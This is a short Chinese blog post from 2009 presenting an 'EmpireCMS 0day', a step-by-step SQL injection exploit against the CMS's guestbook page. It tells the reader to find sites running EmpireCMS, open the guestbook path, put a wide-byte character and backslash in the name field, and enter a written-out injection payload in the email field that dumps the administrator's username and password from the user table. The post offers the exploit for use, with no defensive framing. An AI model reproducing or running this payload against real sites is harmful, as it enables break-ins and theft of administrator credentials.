帝国CMS网站程序0DAY
2009-6-22 23:12:51 分类:漏洞信息 作者:xloong 已被围观loading 次 被网友评论0条 我要评论
帝国CMS网站程序0DAY:找到使用帝国CMS的站,网址后面直接加:
e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:
縗\
联系邮箱处写:
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
via:amxking
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]
本文链接地址: http://www.15897.com/blog/post/EmpireCMS-0day.html
已有0位网友对本文做了一针见血的评论 【我要评论】
相关文章
发表评论>>
- 0条评论
- 引用通告
- 收起评论列表
评论:
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
订阅RSS
搜 索
最新发表
最新评论
最新留言
其 他